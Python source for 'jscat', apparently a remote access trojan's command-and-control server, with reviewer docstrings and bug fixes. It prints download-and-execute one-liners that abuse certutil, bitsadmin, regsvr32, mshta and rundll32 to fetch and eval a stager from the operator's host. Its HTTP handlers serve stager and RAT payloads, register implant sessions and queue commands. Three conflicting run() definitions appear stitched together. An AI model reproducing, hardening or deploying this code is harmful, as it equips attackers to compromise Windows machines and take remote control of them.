def run(cmdArguments):
    """Start the jscat listener and drive the operator console until it exits.

    Args:
        cmdArguments: dict of parsed CLI options. Reads ``new_key``, ``host``
            and ``port``; writes the resolved RC4 key back into ``new_key``
            before handing the whole dict to ``Server``.

    Blocks in the console loop. A falsy ``httpd.shell.get_command()`` (the
    operator quit) shuts the server down and ends the process via ``exit()``;
    Ctrl-C shuts it down and logs the shutdown instead.
    """
    # Resolve the RC4 key (CLI-supplied or generated) and show it, since the
    # implant side has to be built with the same key.
    # NOTE(review): RC4 is a broken stream cipher with no integrity check --
    # treat this as traffic obfuscation, not real confidentiality.
    rc4_key = get_rc4_key(cmdArguments.get('new_key'))
    Log.log_message(
        '[*]server cipher key: {}'.format(BOLD(rc4_key)), log_type=Log.SERVER)
    cmdArguments['new_key'] = rc4_key

    connect_host = cmdArguments['host']
    connect_port = int(cmdArguments['port'])

    # Bring up the HTTP listener the implants call back to.
    httpd = Server(cmdArguments)
    httpd.start()
    Log.log_message(
        '[*]host connect ip is {}:{}...'.format(BOLD(connect_host), BOLD(connect_port)),
        log_type=Log.SERVER)
    print_online_cmd(connect_host, connect_port)

    # Operator console: keep pulling commands until the shell signals quit.
    try:
        while httpd.shell.get_command():
            pass
        httpd.shutdown()
        exit()
    except KeyboardInterrupt:
        httpd.shutdown()
        Log.log_message('server shutdown', log_type=Log.SERVER)
def run(ip, port, new_key, sleep_time):
    """Start the jscat listener and serve the operator console until exit.

    Args:
        ip: callback address embedded in the generated one-liners and passed
            to ``Server``.
        port: listen port, passed through unconverted to ``Server`` and the
            log lines.
        new_key: RC4 key requested on the command line, or a falsy value to
            let ``get_rc4_key`` choose one.
        sleep_time: forwarded to ``Server`` (consumed when the ``/rat``
            payload is built).

    Blocks in the console loop; returns after Ctrl-C, or ends the process via
    ``exit()`` once ``get_command`` reports that the operator quit. The
    "server running in 0.0.0.0" line is a fixed string -- the real bind
    address is presumably decided inside ``Server``.
    """
    # NOTE(review): RC4 is a broken stream cipher with no integrity check --
    # treat this key as traffic obfuscation, not real confidentiality.
    rc4_key = get_rc4_key(new_key)
    Log.log_message(
        '[*]server cipher key: {}'.format(BOLD(rc4_key)), log_type=Log.SERVER)

    # One session store and one shell are shared with the handler via Server.
    session = Session()
    httpd = Server(ip, port, JSCatServer, session, Shell(session), rc4_key,
                   sleep_time)
    httpd.start()

    Log.log_message(
        '[*]server running in  {}:{}...'.format(BOLD('0.0.0.0'), BOLD(port)),
        log_type=Log.SERVER)
    Log.log_message(
        '[*]host connect ip is {}:{}...'.format(BOLD(ip), BOLD(port)),
        log_type=Log.SERVER)
    print_online_cmd(ip, port)

    # Console loop: a falsy get_command() is the operator's quit signal.
    try:
        while httpd.shell.get_command():
            pass
        httpd.shutdown()
        exit()
    except KeyboardInterrupt:
        httpd.shutdown()
        Log.log_message('server shutdown', log_type=Log.SERVER)
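def print_online_cmd(host, port):
    """Print one-liners that make a Windows target fetch and run the stager.

    Each line is a download-and-execute command built on a signed system
    binary (certutil, bitsadmin, regsvr32, mshta, rundll32) that pulls the
    ``/init`` or ``/file.sct`` route served by ``do_GET`` over plain HTTP.

    Args:
        host: address the *target* can reach this listener on; it is
            embedded verbatim in the URLs.
        port: listener port, embedded verbatim as well.

    Fix: the rundll32 line is now a raw string. Its ``\\..\\mshtml`` fragment
    was written as ``'\\..\\m...'`` in a normal literal, which only works
    because ``\\.`` and ``\\m`` are not valid escapes; Python 3.12+ emits a
    SyntaxWarning for that, and a future version may reject it.
    """
    # Build the base URL once; every command points at the same listener.
    base = 'http://{}:{}'.format(host, port)

    print('[*]Execute in host:')
    print('{} -urlcache -split -f {}/init css.js && cscript //nologo css.js'
          .format(BOLD('certutil'), base))
    print('{} /transfer n {}/init css.js && cscript //nologo css.js'
          .format(BOLD('bitsadmin'), base))
    print('{} /s /n /u /i:{}/file.sct scrobj.dll'
          .format(BOLD('regsvr32'), base))
    print(
        '''{} javascript:eval("x=new ActiveXObject('WinHttp.WinHttpRequest.5.1');x.open('GET','{}/init',false);x.send();eval(x.responseText)")(window.close())'''
        .format(BOLD('mshta'), base))
    # Raw string: the payload contains literal backslashes that must survive.
    print(
        r'{} javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","{}/init",false);x.send();eval(x.responseText);window.close();'
        .format(BOLD('rundll32'), base))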
def run(ip, port, new_key, sleep_time):
    """Start the jscat listener and run the operator console until it exits.

    Args:
        ip: callback address embedded in the generated one-liners and given
            to ``Server``.
        port: listen port, passed through unconverted.
        new_key: RC4 key from the command line, or a falsy value to let
            ``get_rc4_key`` choose one.
        sleep_time: forwarded to ``Server`` (consumed when the ``/rat``
            payload is built).

    Runs until Ctrl-C (returns after shutting the server down) or until
    ``get_command`` returns a falsy value (shuts down and calls ``exit()``).
    """
    # NOTE(review): RC4 is a broken stream cipher with no integrity check;
    # the key shown here obfuscates the C2 traffic rather than protecting it.
    rc4_key = get_rc4_key(new_key)
    print('[*]server encrypt key is {}'.format(BOLD(rc4_key)))

    # Session store and shell are shared with the request handler via Server.
    session = Session()
    httpd = Server(ip, port, JSCatServer, session, Shell(session), rc4_key,
                   sleep_time)
    httpd.start()
    print('[*]server running in {}:{}...'.format(BOLD(ip), BOLD(port)))
    print_online_cmd(ip, port)

    # Console loop; a falsy get_command() is the operator's quit signal.
    try:
        while httpd.shell.get_command():
            pass
        httpd.shutdown()
        exit()
    except KeyboardInterrupt:
        httpd.shutdown()
        print('server shutdown')
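    def do_POST(self):
        """Handle an implant check-in and answer with the next job to run.

        The ``session`` cookie drives the flow:
          * no cookie       -> issue a fresh random session cookie and reply
                               with the session-init job;
          * known session   -> refresh its record, file the job result
                               carried in the body (when it names a job id)
                               and reply with the next queued job;
          * unknown session -> register it only when the body is the reply
                               to job id 1 (the init job); otherwise re-send
                               the init job.
        Every reply body goes through ``__encrypt_context`` before sending.

        Fix: the body length is validated. A missing or non-numeric
        Content-Length used to raise out of ``int()`` and a negative one
        turned ``rfile.read()`` into read-to-EOF, blocking the handler until
        the peer closed the socket; those now get a 400 and return early.

        NOTE(review): the session key is taken verbatim from the client's
        cookie and registered as-is on a job-id-1 reply, so a client can
        choose its own session id -- confirm that is intended. The body
        length is not capped beyond being non-negative.
        """
        context = b''
        session_key = self.__check_cookie_session()

        if not session_key:
            # First contact: hand out a session cookie plus the init job.
            self.headers_to_send.append({
                'key': 'Set-Cookie',
                'value': 'session={}'.format(
                    self.session.get_random_session_key()),
            })
            context = self.session.load_init_job()
        else:
            # Reject a missing, malformed or negative Content-Length instead
            # of crashing the handler or blocking on an unbounded read.
            try:
                content_len = int(self.headers.get('content-length', ''))
            except (TypeError, ValueError):
                content_len = -1
            if content_len < 0:
                self.__to_reply(400, b'')
                return
            post_body = self.rfile.read(content_len)
            job_id, job_context = self.__check_response(post_body)

            if session_key in self.session.SESSIONS:
                # Known implant: update its record, file the job result if
                # there is one, then queue up the next job for it.
                self.session.update_session(session_key)
                if job_id:
                    print('\n[+]received client:{},SID/JOB:{}/{}, bytes {}'.
                          format(
                              BOLD(self.client_address[0]),
                              BOLD(self.session.SESSIONS[session_key]['id']),
                              BOLD(job_id), BOLD(content_len)))
                    self.session.check_job(session_key, job_id, job_context)
                context = self.session.load_job(session_key)
            elif job_id and job_id == 1:
                # Reply to the init job from a not-yet-registered session:
                # create the session record from what the client reported.
                print('\n[+]received {}, client:{},bytes {}'.format(
                    BOLD('SESSION INIT'), BOLD(self.client_address[0]),
                    BOLD(content_len)))
                self.session.init_session(session_key,
                                          self.client_address[0],
                                          self.headers['User-Agent'],
                                          job_context)
                context = self.session.load_job(session_key)
            else:
                # Unknown session that did not answer the init job: start over.
                context = self.session.load_init_job()

        self.__to_reply(200, self.__encrypt_context(context))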
    def do_GET(self):
        """Serve the stager payloads by URL path; anything else gets an empty 200.

        Routes (all unauthenticated -- anyone who can reach the port can pull
        the stagers, which is what the ``print_online_cmd`` one-liners rely on):
          ``/init...``     -> ``Payload.init``
          ``/file.sct...`` -> ``Payload.regsvr`` (regsvr32 scriptlet)
          ``/rat``         -> ``Payload.rat`` built with the server's RC4 key
                              and sleep interval; also points the console
                              prompt at the requesting client address.
        Unlike ``do_POST``, the reply body is sent without ``__encrypt_context``.
        """
        requested = self.path
        body = b''

        if requested.startswith('/init'):
            body = Payload.init(self.server.host, self.server.port)
            print('\n[+]received {} client:{}'.format(
                BOLD('INIT'), BOLD(self.client_address[0])))
        elif requested.startswith('/file.sct'):
            body = Payload.regsvr(self.server.host, self.server.port)
            print('\n[+]received {} client:{}'.format(
                BOLD("REGSVR32"), BOLD(self.client_address[0])))
        elif requested == '/rat':
            srv = self.server
            body = Payload.rat(srv.host, srv.port, srv.rc4_key, srv.sleep_time)
            # Retarget the operator prompt at whoever just pulled the RAT.
            srv.shell.prompt_msg = '{} >'.format(self.client_address[0])
            print('\n[+]received {} client:{}'.format(
                BOLD('RAT'), BOLD(self.client_address[0])))

        self.__to_reply(200, body)